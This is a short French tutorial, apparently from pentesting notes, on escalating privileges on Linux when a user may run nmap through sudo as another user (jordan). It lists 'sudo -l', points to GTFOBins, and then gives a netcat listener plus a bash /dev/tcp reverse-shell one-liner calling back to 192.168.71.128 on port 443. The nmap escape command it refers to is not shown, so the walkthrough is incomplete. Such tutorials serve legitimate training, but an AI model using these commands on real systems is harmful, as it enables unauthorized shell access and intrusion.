Sudo (Nmap) - Linux Privilege Escalation

Avec la commande suivante, nous vérifions si notre utilisateur a des privilèges Sudoers :

sudo -l

Si vous exécutez avec sudo -u jordan nmap et qu'il est accepté, cela signifie qu'aucun mot de passe ne vous sera demandé, et la commande est exécutée en tant qu'utilisateur jordan :

Recherchez sur la page gtfonbins en filtrant par Nmap :

Enfin, si nous exécutons la commande suivante, nous obtiendrons un shell comme Jordan

Tout comme avec nmap, lorsque vous écrivez, cela ne s'affiche pas. Ce que nous ferons, c'est nous mettre en écoute avec Netcat depuis notre terminal :

nc -nlvp 443

Et dans la console de nmap, exécutez la commande suivante pour obtenir un shell inversé :

bash -c "bash -i >& /dev/tcp/192.168.71.128/443 0>&1"

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?